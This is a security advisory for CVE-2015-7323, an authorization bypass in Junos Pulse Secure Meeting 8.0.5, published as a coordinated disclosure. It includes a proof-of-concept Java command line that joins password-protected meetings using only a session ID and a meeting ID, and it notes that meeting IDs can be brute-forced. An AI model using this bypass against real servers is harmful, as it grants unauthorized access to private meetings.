Profundis Labs - Security Advisory Vulnerablity Title ================== Secure Meeting (Pulse Collaboration) issue may allow authenticated users to bypass meeting authorization (CVE-2015-7323) Vendor: ======= Pulse Secure, LLC (www.pulsesecure.net) Product: ======== Junos Pulse Secure Meeting Secure Meeting is a part of the Junos Puls software, which allows you to organize and holding virtual meetings with internal and external users via the Juniper Access Gateway. Affected Versions: ================== 8.0.5 Vulnerability Type: =================== Insufficient Authorization Checks CVE Reference: ============== CVE-2015-7323 VENDOR Reference: ================= https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA40054 Vulnerability Details: ===================== It is possible to enter "secure" meetings without knowledge of the password and the invitation link using the java fat client (meetingAppSun.jar). To access such meetings the following information is required: - A valid sessionID (DSID) This sessionID can be obtained by either having an invitation link to any other meeting or the user has a valid account to log into junos pulse using the http login form. - The meeting ID The meeting ID is a 7-8 digits number which may be gained using brute force or by other means. Note: The vulnerability is only related to the java fat client. If a user tries to access a secure meeting using the web browser (https://domain/dana-na/meeting/login_meeting.cgi?mid=PARAM_A&occurrence=0), the meeting password (or invitation link) is required. PoC code(s): =============== Example how to start the java fat client to access a meeting A from the command line: java -classpath /usr/lib/jvm/java-7-oracle/jre/lib/plugin.jar:~/.juniper_networks/meetingAppSun.jar SecureMeetingApplication ivehost PARAM_D locale de log_level 1 meeting_type 0 Parameter0 "meeting_id=PARAM_A;user_name=xxx;cert_md5=PARAM_B;ncp_read_timeout=90;password=;meeting_url=;mobile_meeting_url=" uploadlog 1 home_dir "/home/..." user_agent "Mozilla/5.0" neoteris-dsid "DSID=PARAM_C" PARAM_A = meeting ID of Meeting A PARAM_B = md5 hash of the SSL-certifificate of Junos Pulse server PARAM_C = a valid sessionID PARAM_D = the domain/IP of the Junos Pulse server Disclosure Timeline: ========================================================= Vendor Notification: 01/2015 Vendor Confirmation: 03/2015 Vendor Patch Release: 06/2015 Public Disclosure: 09/2015 Severity Level: ========================================================= CVSS Score: 5.0 (AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N) Description: ========================================================== Request Method(s): [+] Proprietary Protocol Vulnerable Product: [+] Pulse Secure 8.0.5 Vulnerable Parameter(s): [+] meeting_id Authentication (Role): [+] User, Guest Access =========================================================== [+] Author: Philipp Rocholl [+] Website: https://www.profundis-labs.com [+] Source: https://profundis-labs.com/advisories/CVE-2015-7323.txt [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. Philipp Rocholl, Profundis Labs